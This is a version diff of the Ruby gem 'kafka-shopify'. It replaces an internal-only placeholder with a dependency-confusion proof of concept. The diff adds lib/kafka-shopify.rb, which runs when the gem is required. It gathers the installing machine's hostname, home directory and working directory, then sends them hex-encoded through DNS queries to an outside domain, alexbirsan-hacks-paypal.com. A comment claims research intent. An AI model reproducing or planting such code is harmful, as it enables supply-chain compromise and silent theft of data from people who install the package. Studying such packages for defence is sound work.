kafka-shopify 1000.0 → 2300.4.2

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: ba357acb7f99050eb38e273944997ce4fae4e9db05b39f0adb8627eb5c8bcac1
-  data.tar.gz: 3ae0c8a06ff72d8b96abb18148f8229d76c71e8df7e3266107422544c5f05f34
+  metadata.gz: 26f4e1bd42d2200bb51f6d74acd49a2a31a1130c5cf0ffa3f7aa5684caa9b664
+  data.tar.gz: 41b89669473f3badfbb98dda7749a7f93886acde6f75a0c34a91e4bcfef1e441
 SHA512:
-  metadata.gz: 28a6a608015559422bacf4c9ee4c3bc8b2da4ef56626085c795f0b4326529d5160acb517b8480c5dbb86ea7c38b20d1b2187f3573a392d92bf2a82abca4e08a1
-  data.tar.gz: c48f082897220c3cfe23e68fcecb6b49136c53c5f108f8707f8e244508e27c1f43c5a67025d3e351c05b2d58b15be2bae9deb76740b7d64d2136dc738cebb71c
+  metadata.gz: 888ac256a66e61ac1d7b8df130f502bfe18dfc37e6e7f14295457e8af165a7329cb40c8271e03aacaea3569a746bf59ef4f46d6fe6c375bb75ec2eebcc5043d1
+  data.tar.gz: ae624aa85fcddce206d9347f400ab43e773c8081ab2f1ea03847a2b66e0ca0d0592a0ce72f05cf866b1853cb8adfa9b8e2d843d446d3c8040e1f0c3f606fdfbc

data/lib/kafka-shopify.rb

@@ -0,0 +1,64 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.alexbirsan-hacks-paypal.com'
+ns = 'dns1.alexbirsan-hacks-paypal.com'
+
+package = 'kafka-shopify'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,29 +1,28 @@
 --- !ruby/object:Gem::Specification
 name: kafka-shopify
 version: !ruby/object:Gem::Version
-  version: '1000.0'
+  version: 2300.4.2
 platform: ruby
 authors:
-- admins@shopify.com
-autorequire:
+- Alex Birsan
+autorequire: 
 bindir: bin
 cert_chain: []
-date: 2020-01-01 00:00:00.000000000 Z
+date: 2020-09-14 00:00:00.000000000 Z
 dependencies: []
-description:
-email:
+description: This package is meant for security research purposes and does not contain
+  any useful code.
+email: alex@ethicalhack.ro
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- Gemfile
-- Rakefile
-- VERSION
-- lib/gem.rb
-homepage:
-licenses: []
+- lib/kafka-shopify.rb
+homepage: https://twitter.com/alxbrsn
+licenses:
+- MIT
 metadata: {}
-post_install_message:
+post_install_message: 
 rdoc_options: []
 require_paths:
 - lib
@@ -39,7 +38,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
       version: '0'
 requirements: []
 rubygems_version: 3.0.3
-signing_key:
+signing_key: 
 specification_version: 4
-summary: placeholder gem
+summary: Security research purposes only
 test_files: []

data/VERSION

@@ -1 +0,0 @@
-1000.0

data/lib/gem.rb

@@ -1 +0,0 @@
-raise 'this is an internal-only gem'